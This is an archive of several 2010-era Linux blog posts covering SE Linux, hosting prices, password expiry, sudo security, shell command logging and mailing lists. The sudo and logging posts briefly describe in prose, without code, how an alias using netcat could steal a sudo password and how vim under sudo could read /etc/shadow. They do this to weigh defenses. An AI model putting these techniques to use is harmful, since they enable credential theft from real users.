Archives

Categories

New SE Linux Policy for Squeeze

I have just uploaded refpolicy version 0.2.20100524-1 to Unstable. This policy is not well tested (a SE Linux policy package ending in “-1” is not something that tends to work well for all people) and in particular lacks testing for Desktop environments. But for servers it should work reasonably well.

I expect to have a better version uploaded before this one gets out of Unstable.

Note that the selinux-policy-default package in this release lacks support for roles, it’s a targeted policy only. I plan to fix this soon.

Can you run SE Linux on a Xen Guest?

I was asked “Can you run SELinux on a XEN guest without any problem?“. In a generic sense the answer is of course YES, Xen allows you to run Linux kernels with all the usual range of features and SE Linux isn’t a particularly difficult feature to enable. I do most of my SE Linux development and testing on virtual machines and until recently I didn’t have any hardware suitable for running KVM, so in the last few years I’ve done more SE Linux testing on Xen than on non-virtual machines. My SE Linux Play Machine [1] (which will be online again tomorrow) is one SE Linux system running under Xen.

But the question was asked in the context of my blog post comparing the prices of virtual hosting providers [2], which changes things.

Both Linode and Slicehost (the two virtual hosting providers that my clients use) provide kernels without SE Linux support, the command “grep selinux /proc/filesystems” (which is the easiest way to test for SE Linux support) gives no output. I am not aware of any other virtual hosting company that provides SE Linux support.

If anyone knows of a virtual hosting company that runs Xen or KVM virtual machines with SE Linux support then please let me know, I’ll write a blog post comparing such companies if there are some.

For the people who work at ISPs: If your company supports SE Linux virtual machines then I would be happy to review your service, just give me a free DomU for a couple of weeks so I can test it out. If your company is considering offering such virtual machines then I would be happy to have a confidential discussion about the issues that you will face, while I am available for paid consulting work in this area I am more than happy to spend an hour or two helping a company that’s going to help support my favorite free software project without expecting to be paid. But I have to note that if a dozen hosting companies happen to want advice I won’t be able to provide two hours of free advice to each of them.

I think that there is an unsatisfied market demand for SE Linux virtual machines. I don’t expect all virtual hosting companies to support it in the near future, but this will make it more profitable for those that do. If for the sake of discussion we assume that 5% of sysadmins who are making purchasing decisions regarding virtual servers really want to have SE Linux support and if 5% of virtual hosting companies were to offer such support, then those hosting companies would almost double their market share as a result of supporting SE Linux. It’s the usual economic factors relating to small companies that profit from providing good support for the needs of a minority of customers.

Virtual Hosting Prices

Linode has just announced a significant increase in the amount of RAM in each of their plans [1].

The last time I compared virtual hosting prices in a serious manner was over two years ago [2], so it seems like a good time to compare the prices again.

Now there are some differences between these providers that make things difficult to compare. Gandi used to not include the OS in the disk allocation – presumably they did de-duplication, I’m not sure if they still do that. OpenVZ/Virtuozzo and Xen can’t be directly compared. OpenVZ is an Operating System Level Virtualisation that allows virtual machines to share resources to some extent which should allow better overall utilisation of the system but may allow someone to hog more resources than they deserve – I prefer virtual machines so tend to avoid that. Virtuozzo is a technology I’m not familiar with so with all things being equal I would choose Xen because I know it better.

Years ago Vpsland deleted one of my DomUs without good notification and without keeping a backup and I’m not about to forgive them. XenEurope and Gandi get good reviews, but I have no personal experience with them so in my personal ranking they are below Linode and Slicehost.

RapidXen offers native IPv6 – a very noteworthy feature. But they are quite expensive.

Note that I have only included providers that advertise in English. I could use Google translation to place an order on a non-English web site but I am not going to risk a situation where Google translation is needed for technical support.

In the price comparison tables I have used $US for price comparisons, where the price was advertised in another currency I put the $US price in brackets. For every provider that doesn’t advertise prices in $US I used XE.com to get a spot price. Note that if you convert between currencies you will not get that rate, I used the spot rate because most of my readers don’t use the $US as their native currency (either due to living in a country that uses it or having business interests based on the $US) – converting from $AU to $US has about the same overhead for me as converting to the Euro or pound.

The bandwidth is listed as either a number of Gigabytes per month that can be transferred or as a number of Megabits per second that the connection may use.

I have tried to roughly order the offerings based on how good they seem to be. But as there are so many factors to consider it’s quite obvious that no provider can be considered to be universally better than the others.

The biggest surprise for me was how well Xen Europe compares to the others. Last time I did the comparison they were not nearly as competitive.

Finally note that I am comparing the options for low-end servers. These are services that are useful for hobbyist use and low-end servers for commercial use. Some providers such as Xen Europe exclude themselves from consideration for serious commercial use by not offering big servers – Xen Europe only supports up to 1GB of RAM.

Prices of Xen virtual servers:

ISP RAM Disk Bandwidth Price
XenEurope 128M 10G 1TB E5 ($6.15)
XenEurope 512M 30G 1TB E17.50 ($21.52)
Linode 512M 16G 200GB $20
RackVM 128M 10G 100GB #4UK ($5.90)
RackVM 512M 30G 300GB #16UK ($23.62)
Slicehost 256M 10G 150GB $20
Slicehost 512M 20G 300GB $38
Gandi 256M 8G 5Mb/s $16
Gandi 512M 16G 10Mb/s $32
RapidXen 256M 20G 2Mb/s $20
RapidXen 512M 20G 2Mb/s $30
Rimuhosting 160M 4G 30GB $20
Rimuhosting 400M 8G 150GB $30

Prices of non-Xen virtualisation systems:

ISP Virtualisation RAM Disk Bandwidth Price
Quantact OpenVZ 256M 15G 300GB $15
Quantact OpenVZ 512M 35G 600GB $35
FreeVPS VMWare 256M 10G 100GB #10UK ($14.76)
FreeVPS VMWare 512M 20G 200GB #15UK ($22.14)
Vpsland Virtuozzo 512M 10G 250GB $20
Vpsland Virtuozzo 1024M 20G 500GB $35

Update: Added RackVM to the listing, and removed the ambiguous part about Gandi disk allocation.

Carpal Tunnel – Getting Better

Three months ago I wrote about getting Carpal Tunnel Syndrome [1]. A few weeks after that I visited the specialist again and had my wrist brace adjusted to make it a little less uncomfortable. The specialist also gave me some quick ultra-sound treatment and then said that if it didn’t get better in a month or two then I should just get a referral to a surgeon!

I didn’t have a bad case, some people have their hand muscles atrophy. My hand strength was measured as 50Kg in my left hand (the one with CTS) and 52Kg in my right hand. The greater strength in my right hand is probably more due to the lack of left-handed tools and sporting equipment than any muscle atrophy. This is slightly better than the physical standards for the Victoria Police (just over 50Kg average for both hands) [2] and a lot better than the Australian Federal Police physical standards of 45Kg for the dominant hand and 40Kg for the non-dominant [3].

Really my hand strength should have been recorded as 490Newton and 510Newton respectively, medicine is the science of healing, in all aspects of science the Newton is the measure of force.

Over the past few months my hand seems to have recovered a lot while wearing the wrist-brace 24*7. I’ve just started going without the wrist-brace during the day and it seems to be OK. I’m currently planning to wear the wrist brace at night for a year or two as it’s the only way to ensure that my hand doesn’t end up on a bad angle when I’m asleep.

At this stage it seems that I’ve made as close to a full recovery from CPS as is possible!

Should Passwords Expire?

It’s widely regarded that passwords should be changed regularly. The Australian government declared last week the “National Cyber Security Awareness Week” [1] and has published a list of tips for online security which includes “Get a stronger password and change it at least twice a year“.

Can a Password be Semi-Public?

Generally I think of a password as being either secret or broken. If a password is known to someone other than the sysadmin and the user who is authorised to use the account in question then you have potentially already lost all your secret data. If a password is disclosed to an unauthorised person on one occasion then merely changing the password is not going to do any good unless the root cause is addressed, otherwise another anothorised person will probably get the password at some future time.

Hitachi has published a good document covering many issues related to password management [2]. I think it does a reasonable job of making sysadmins aware of some of the issues but there are some things I disagree with. I think it should be used as a list of issues to consider rather than a list of answers. The Hitachi document lists a number of ways that passwords may be compromised and suggests changing them every 60 to 90 days to limit the use of stolen passwords. This seems to imply that a password is something that’s value slowly degrades over time as it’s increasingly exposed.

I think that the right thing to do is to change a password if you suspect that it has been compromised. There’s not much benefit in having a password if it’s going to be known by unauthorised people for 89 days before being changed!

Fundamentally a password is something that can have it’s value rapidly drop to zero without warning. It doesn’t wear out.

Why are terms such as Three Months used for Maximum Password Ages?

The Hitachi document gives some calculations on the probability of a brute-force attack succeeding against a random password with 90 days of attacking at a rate of 100 attempts per second [2]. I think that if a service is run by someone who wouldn’t notice the load of 100 attempts per second then you have bigger security problems than the possibility of passwords being subject to brute-force attacks. Also it’s not uncommon to have policies to lock accounts after as few as three failed login attempts.

Rumor has it that in the early days of computing when the hashed password data was world readable someone calculated that more than 3 months of CPU time on a big computer would be needed to obtain a password by brute-force. But since then the power of individual CPUs has increased dramatically, computers have become cheap enough that anyone can easily gain legal access to dozens of systems and illegal access to a million systems, and it has become a design feature in every OS that hashed passwords are not readable by general users. So the limiting factor is to what degree the server restricts the frequency of password guesses.

I don’t think that specifying the minimum password length and maximum password age based on the fraction of the key space that could be subject to a brute-force attack makes sense.

I don’t think that any attempt to make an industry-wide standard for the frequency of password changes (as the government is trying to do) makes sense.

Can there be a Delay between a Password being Compromised and being Used by an Attacker?

Hypothetically speaking, if a password was likely to be compromised (EG by having the paper it was written on lost or stored insecurely) for some time before an attacker exploited it, then if the password was changed during that time period it could solve the problem. For example when a company moves office there is the possibility of notepaper with passwords to be lost. So if the sysadmin caused every user password to expire at the time of the move then a hostile party would be unable to gain access.

Another possibility is the theft of backup tapes that contain the list of unencrypted passwords. If users change their passwords every three months then the theft of some four month old backup tapes will be less of a problem.

Another possibility concerns the resale of old computers, phones, and other devices that may contain passwords. A reasonably intelligent user won’t sell their old hardware as soon as the replacement device arrives, they will want to use the new device for some time to ensure that it works correctly. If passwords expire during this trial period with the new device then passwords stored in the old device won’t have any value. The down-side to this idea is that people probably sell their old gear fairly quickly and making passwords expire every two weeks would not be accepted well by the users.

It seems to me that having bulk password changes (all passwords for one user or for one company) based on circumstances that lead to potential insecurity would do more good than changing passwords at a fixed schedule.

How are Passwords typically Compromised?

Dinei Florêncio and Cormac Herley of Microsoft Research and Baris Coskun of Brooklyn Polytechnic University wrote a paper titled “Do Strong Web Passwords Accomplish Anything?” [3] which discusses this issue. The first thing that they note is that nowadays passwords are most commonly compromised by phishing and keylogging. In those cases passwords are typically used shortly after they are stolen and the strength of a password never does any good. That paper suggests that banks should use stronger user-names rather than stronger passwords to combat the threat of bulk brute-force attacks.

Can a Password Last Forever?

If a password is entered in a secure manner, authenticated by a secure server, and all network links are encrypted or physically protected then there should never be a need to change it.

Of course nothing is perfectly secure, so for some things with minimal short-term value or which can be used without anyone noticing there is a benefit in changing the password. But in the case of Internet banking if a hostile party gets your login details then you will probably know about it in a few days when the bank calls you about the unusual transactions from foreign countries – long before a 90 day password change schedule would have done any good.

Maybe one of the issues determining whether a password should be changed regularly is whether an attacker could use long-term read-only access to gain some benefit. Being able to read all the email someone received for a year could be a significant benefit if that person was a public figure, and there’s usually no way for an ISP customer to know that someone else is downloading all their mail via POP or IMAP.

Should a Password be the only Authentication Method?

It is generally agreed that an authenitcation method should ideally involve something you have plus something you know. That means a password and a physical device such as a smart card, token with a changing sequential password, or a key such as a Yubikey [4]. If the physical device can’t be cloned (through some combination of technical difficulty and physical access control) then it significantly improves security. When a physical device is used the purpose of the password is merely to stop someone who steals the physical device from being immediately exploit everything – the password only has to be strong enough to keep the accounts secure until a new token can be issued.

The combination of something you have and something you know is very strong. Having a physical token stored on the desk next to the PC that is used for logging in provides a significant benefit, then an attacker needs to break in to the house and can’t sniff the password by compromising the PC remotely.

Conclusion

In all aspects of security you need to consider what threats you face. If an attacker is likely to launch an immediate noisy attack (such as transferring the maximum funds out of an Internet banking account) then changing the password regularly won’t do any good. If a subtle long-term attack is expected then changing the password can do a lot of good – but a physical token is the ideal if the account is valuable enough.

But to put things in to perspective, it’s technically possible to use a mobile phone camera at close range (or a SLR with a big lens at long range) to take a photo of keys that allow reproducing them. But this hasn’t stopped people from carrying their house keys in an obvious manner that permits photography or leaving them on their desk at work. Also I’ve never heard of anyone routinely changing the door locks in case a hostile party might have got a key – although I’m sure that such practices are common in highly secure locations. Few people even take their house keys off the key-ring when they have their car serviced!

Related Posts

Defense in Depth and Sudo – when using sudo can increase security and when it can’t.
Logging Shell Commands – how to log what the sysadmin does and what benefits that provides you, it doesn’t help if the sysadmin is hostile.
Logging in as Root – should you login directly as root?

Defense in Depth and Sudo

My blog post about logging in as root and whether sudo provides any benefit [1] got some interest on Redit. In the Reddit comments on my post [2] there are a lot of strange things. One interesting comment was to suggest that logging in as non-root provided “defense in depth”.

The NSA is credited with inventing the term “Defense in Depth” as applied to the computer industry, they have a PDF that gives an overview of the concept [3]. It seems that Defense in Depth is all about having multiple different layers of security, firewalls, IDS/IPS, passwords, PKI, etc. Entering the same password twice (once to login and once to run sudo – which seems to be a fairly typical configuration of sudo) hardly seems to count.

Can using sudo provide Defense in Depth benefits?

With a typical configuration the use of sudo provides no real protection. The user either enters their own password or the root password to gain full root access, in either case the attacker can exploit their session and get the password. A session exploit can be easily arranged by creating a shell function or alias that makes sudo run something else (such as using netcat to send the password out over the network).

One way of making this sort of attack more difficult is to make root own the user home directory, files such as ~/.login that are used by the user shell, the ~/.ssh directory and the ~/.ssh/authorized_keys file. This way a hostile party can’t change the configuration, so a successful attack has to involve a long running process that uses ptrace to intercept the shell and divert an attempt to run sudo.

If the non-root user is prevented from using ptrace then things start to become a little more difficult for the attacker. In some quick tests I was able to capture about half the data through messing with /proc/X/fd/0 and /proc/X/fd/1 for a target process, but it seems that it would be difficult to get an entire password that way. To disable ptrace you could compile a kernel without ptrace support, use a SE Linux policy that prevents prevent ptrace access for the sessions in question, or make the user’s shell SETGID.

If the root account and the account used for su or sudo use different authentication methods, where the options include ssh authorized keys, password, and security token (maybe both password and token for the root account) then it does seem that it would provide some Defense in Depth benefits.

sudo can be used to only permit executing certain commands. While this is a real security benefit it doesn’t allow full sysadmin work, merely delegating some portions of operations to people who don’t have full sysadmin rights. As someone needs to have full access to fix any problem that might occur on the machine someone needs to have access to run any command as root. So while sudo is great for providing limited administrative access to certain junior people, it’s not going to stop an attack on a member of the sysadmin team.

Conclusion

In a typical sudo configuration the non-root account is configured in a default Unix manner (with the user having ownership of their home directory). The user who logs in to that account controls it’s environment through .login and other scripts, so sudo doesn’t gain anything.

In a typical configuration ptrace is enabled so even if the critical environment files can’t be modified by a hostile party they can get the same result through ptrace. Admittedly using a SETGID shell is not going to be difficult to implement after you have changed the ownership of the home directory.

If you have a configuration where ptrace is not available and the non-root user can’t modify their own profile files then it starts to become difficult for an attacker. If root authentication requires using a security token such that every login uses a different code and the code expires rapidly then it becomes even more difficult for an attacker.

But for all configurations that are close to the default for every OS that I’ve ever used none of these conditions hold. Also none of those conditions held for any of the systems I’ve been employed to use which were configured to require su or sudo for root access.

As it seems that most sudo configurations don’t provide any extra security, and that auditing the actions of the sysadmin can be better done in other ways (such as the Bash 4.1 syslog feature) [4] it seems that for the vast majority of systems sudo doesn’t provide a benefit.

The fact that sudo could provide a benefit if configured in a way that is quite different to all the defaults and the ways that it is typically used is worth noting. I’m not going to argue with anyone who wants to configure their systems in such a manner and who believes that they need to do so. But anyone who thinks that sudo is the only way to go because the Ubuntu default configuration does it really needs to investigate the issues. Remember that blind faith in the security choices of other people can be a security problem.

Links June 2010

Seth Berkley gave an interesting TED talk about developing vaccines against the HIV and Influenza viruses [1]. The part I found most interesting was the description of how vaccines against viruses are currently developed using eggs and how they plan to use bacteria instead for faster and cheaper production. One of the problems with using eggs is that if the chickens catch the disease and die then you can’t make a vaccine.

Aigars Mahinovs wrote a really good review of Microsoft Azure and compared it to Amazon EC2 [2]. It didn’t surprise me that Azure compared poorly to the competition.

Johanna Blakley gave an insightful TED talk about IP lessons from the fashion industry [3]. She explained how an entire lack of IP protection other than trademark law was an essential part of the success of the fashion industry. She also compared the profits in various industries and showed that industries with little or no IP protection involve vastly larger amounts of money than industries with strong IP protection.

Lisa D wrote an insightful post about whether Autism Spectrum Disorders (such as Asperger Syndrome) should be considered to be disabilities [4]. I don’t entirely agree with her, but she makes some really good points.

Sharmeen Obaid-Chinoy gave an interesting TED talk about the way the Taliban train young children to become suicide bombers [5]. Apparently the Taliban prey on large poor families, sometimes paying the parents for taking children away to “school”. At the Taliban schools the children are beaten, treated poorly, and taught theology by liars who will say whatever it takes to get a result. Then after being brain-washed they are sent out to die.

Wired has an interesting article about Charles Komanoff’s research into New York traffic problems [6]. He aims to track all the economic externalities of traffic patterns and determine incentives to encourage people to do things that impose less costs on the general economy. His suggestions include making all bus travel free as the externality of the time spent collecting fares is greater than the fare revenue. It’s a really interesting article, his research methods should be implemented when analysing traffic in all large cities, and many of his solutions can be implemented right now without further analysis – such as free buses and variable ticket pricing according to the time of day.

William Li gave an interesting TED talk about starving cancer by preventing new blood vessels from growing to feed it [7]. Drugs to do this have been shown to increase the life expectancy of cancer patients by more than 100% on average. Also autopsies of people who died in car accidents show that half the women in their 40’s had breast cancer and half the men in their 50’s prostate cancer but those cancers didn’t grow due to a natural lack of blood supply, so the aim here is to merely promote what naturally happens in terms of regulating cancers and preventing them from growing larger than 0.5mm^3. There are a number of foods that prevent blood vessels growing to cancers which includes dark chocolate! ;) Also drugs which prevent blood vessel growth also prevent obesity, I always thought that eating chocolate all the time prevented me from getting fat due to the central nervous system stimulants that kept me active…

Graham Hill gave an inspiring TED talk about becoming a weekday vegetarian [8]. Instead of making a commitment to being always vegetarian he’s just mostly vegetarian (only eating meat on Sundays). He saves most of the environmental cost and doesn’t feel guilty if he ever misses a day. It’s an interesting concept.

Cory Doctorow wrote an insightful article for the Guardian about the phrase “Information Wants To Be Free [9]. He points out that really it’s people who want to be free from the tyranny that is being imposed on us in the name of anti-piracy measures. He also points out that it’s a useful straw-man for the MAFIAA to use when claiming that we are all pirates.

The Atlantic has an interesting article about the way that Google is working to save journalistic news [10].

Adam Sadowsky gave an interesting TED talk about creating a Rube Goldberg machine for the OK Go video “This Too Shall Pass” [11]. At the end of the talk they include a 640*480 resolution copy of the music video.

Brian Cox gave an interesting TED talk advocating increased government spending on scientific research [12]. Among other things he pointed out that the best research indicates that the amount of money the US government invested in the Apollo program was returned 14* to the US economy due to exports of new American products that were based on that research. It’s surprising that any justification other than the return on investment for the Apollo program is needed!

Moot gave an interesting TED talk about Anonymity [13]. I don’t think that he made a good case for anonymity, he cited one person being identified and arrested for animal cruelty due to the efforts of 4chan people and also the campaign against the Cult of Scientology (which has not been very successful so far).

Rory Sutherland gave an intriguing TED talk titled “Sweat the Small Stuff” [14]. He describes how small cheap changes can often provide greater benefits than huge expensive changes and advocates corporations having a Chief Detail Officer to take charge of identifying and implementing such changes.

TED Hosted an interesting debate between pro and anti nuclear campaigners [15]. They agreed that global warming is a significant imminent problem but disagree on what methods should be implemented to solve it.

Logging Shell Commands

In response to my previous post about logging in directly as root [1] it was suggested that using sudo is the only way to log the commands that are entered as root. One reason for doing this is if you don’t trust the people who are granted root access and you want to log all commands to a remote server that is run by different people. I wonder whether it is really possible to run systems with untrusted sysadmins, if someone can apply patches etc then they can surely install a trojan and then wait a while before activating it to make things more difficult for anyone who is analysing the logs.

One of the many issues is that even the restricted version of vim permits the :r and :w commands, so one could start vim from sudo with an innocuous file as the target of the edit operation and then read and write some critical file such as /etc/shadow. I expect that someone has written an editor which has a restricted mode that doesn’t allow reading/writing files other than the one specified on the command-line, and if not it surely wouldn’t be difficult to patch vim (or your favorite editor) to have such a mode of operation. But there are always other programs that can access files other than the ones specified on their command-line. It seems that using the auditctl interface to log access to certain critical files (EG read access to /etc/shadow and write access to everything under /etc, /bin, /sbin, and /usr) would be a necessary part of an effective auditing strategy and that sudo would only comprise a small part of a useful configuration.

There are other viable ways of logging everything that is done as root which offer benefits over sudo.

Ways of Logging Shell Commands

The Korn shell supports doing all the logging you might desire as part of a shell function [2].

Bash can have a similar shell function to do the logging, but when a command is entered the previous command is logged [3], this means that any single bash command that unsets this will never be logged. It might be possible to solve this if you know more about Bash than I do. I wonder if the Korn shell function has the same issue. This is still probably useful for some situations when you want to track what honorable sysadmins do, but of little benefit for tracking hostile sysadmins – (tracking hostile sysadmins is actually possible).

You can put code in a file such as /etc/bash.bash_logout to log the commands elsewhere, but even trivial things such as “kill -9 $$” can defeat that so it’s only useful when the sysadmin is trusted.

The Sudoshell project exists to log all data that is entered in a shell [3]. One deficiency of this for the people who don’t trust the root user is that it logs the data to files on disk, but it shouldn’t be difficult to rewrite sudoscriptd to write directly to another machine over the network. Also one benefit of this for auditing is that it captures all the output of the commands as well (which can be a little inconvenient to decipher when curses programs are run. The web site also describes some of the problems with trying to use sudo directly for everything (such as pipelines).

If you compile Bash version 4.1 with the SYSLOG_HISTORY macro enabled (which can be done by editing the file config-top.h) then it will log all commands to syslog. RootShell.be has a short post about this which mentions the security issues, some commands take passwords as parameters and these passwords could be exposed to the network [5]. Of course the best option is to just avoid such commands. Thanks to Chris Samuel for pointing out the Bash logging feature.

Conclusion

If you use sudo for auditing root access then you lose some shell functionality. Sudo also only logs the commands that are executed – you don’t get logging of output. It seems that depending on the exact needs either a modified version of Sudoshell or the logging that can be compiled in to Bash would be the way to go depending on the exact requirements. The main benefit of using sudo for logging would be that some distributions of Linux are configured that way by default – but it seems unlikely that someone would go to the effort of running a separate logging server that the regular sysadmin team can’t touch and then configure their servers in a default manner.

Mailing List Meta-Discussions

It seems that most mailing lists occasionally have meta-discussions about what is on-topic, the few that don’t are the ones that have very strong moderation – authoritarian moderators who jump on the first infraction and clearly specify the rules.

I don’t recall the list of acceptable topics for any mailing list including “also discussions about what is on-topic“. As this is the Internet I’m sure that someone will immediately point out an example of such a list, but apart from the counter-example that someone will provide it seems obvious that for the majority of mailing lists a meta-discussion is not strictly on topic.

Regardless of a meta-discussion not being on-topic I don’t think there’s anything wrong with such a discussion on occasion. But if a meta-discussion is to be based on the volume of off-topic messages it would be nice if the people who advocate such a position could try and encourage the discussion in a way that reduced the number of messages. Replying to lots of messages is not a good strategy if your position is that there are too many messages.

If a meta-discussion is going to be about moving off-topic discussions to other forums that are more appropriate then it would be nice to have the meta-discussion move to another forum if possible. My previous post which advocates creating a separate mailing list for chatty messages was an attempt to move a discussion to a different forum [1]. Anyone who believes that such discussions don’t belong on a list such as debian-private is free to commit their thoughts to some place that they consider more appropriate and provide the URL to any interested parties. I think that it’s worth noting that the only comment on my previous post is one that describes how to filter mail to split the traffic from the debian-private list into different mailboxes. I had hoped that other people would write blog posts advocating their positions which would allow us to consider the merits of various ideas without the he-said-she-said element of mailing list discussions.

Most mailing lists have a policy against profanity and some go further and ban personal abuse. Therefore it seems hypocritical to advocate a strict interpretation of the rules in regard to what is on-topic while also breaking the rules regarding profanity or personal abuse. I don’t think it’s asking a lot to suggest that the small minority of messages that someone writes on the topic of a list meta-discussion should obey the set of rules that they advocate – I’m not suggesting that someone should obey all the rules all the time, just when they are trying to enforce them. Also you can argue that a list policy against profanity doesn’t preclude sending profane messages off-list, but if the off-list messages are for the purpose of promoting the list rules it still seems hypocritical to use profanity.

It is a fair point that off-topic discussions and jokes can distract people from important issues and derail important discussions. It would be good if people who take such positions would implement them in terms of meta-discussions. If the purpose of a meta-discussion is to avoid distraction from important issues then it seems like a really good idea to try and avoid distraction in the meta-discussion thread.

I wonder whether a meta-discussion can provide anything other than a source of lulz for all the people who don’t care about the issue in question. The meta-discussions in the Debian project seem to always result in nothing changing, not even when the majority of people who comment agree that the current situation is not ideal. When an almost identical meta-discussion happens regularly it seems particularly pointless to start such a discussion for the purpose of reducing off-topic content. Revisiting an old discussion can do some good when circumstances change or when someone has some new insight. I know that it’s difficult to avoid being sucked into such discussions, when I was diagnosed with AS [2] I decided to try and minimise my involvement in such discussions – but I haven’t been as successful at doing so as I had hoped.

Does Every Serious Mailing List need a Non-Serious Counterpart?

One practice that seems relatively common is for an organisation to have two main mailing lists, one for serious discussions that are expected to be relatively topical and another for anything that’s not overly offensive. Humans are inherently incapable of avoiding social chatter when doing serious work. The people who don’t want certain social interactions with their colleagues can find it annoying to have both social and serious discussions on the same list. While the people who want social discussions get annoyed when people ask them to keep discussions on topic.

Organisations that I have been involved with have had mailing lists such as foo-chat and foo-talk for social discussions that involve the same people as the main list named “foo“, as well as having list names such as “memo-list” for random discussions that are separate from a large collection of lists which demand on-topic messages.

The Debian project has some similar issues with the debian-private mailing list which is virtually required reading for Debian Developers. One complication that Debian has is that the debian-private list has certain privacy requirements (messages will be declassified after 3 years unless the author requests that they remain secret forever) which make it more difficult to migrate a discussion. You can’t just migrate a discussion from a private list to a public list without leaking some information. So it seems to me that the best solution might be to have a list named debian-private-chat which has the same secrecy requirements but which is not required reading. As debates about what discussions are suitable for debian-private have been going on for more than 3 years I don’t think there’s any reason not to publish the fact that such discussions take place.

Also it seems that every organisation of moderate scale that has a similar use of email and for which members socialise with each other could benefit from a similar mailing list structure. Note that I use a broad definition of the word “socialise” – there’s a lot of people who will never meet in person and a lot of the discussions are vaguely related to the main topic.

I wonder whether it might be considered to be a best practice to automatically create a chat list at the same time as creating a serious discussion list.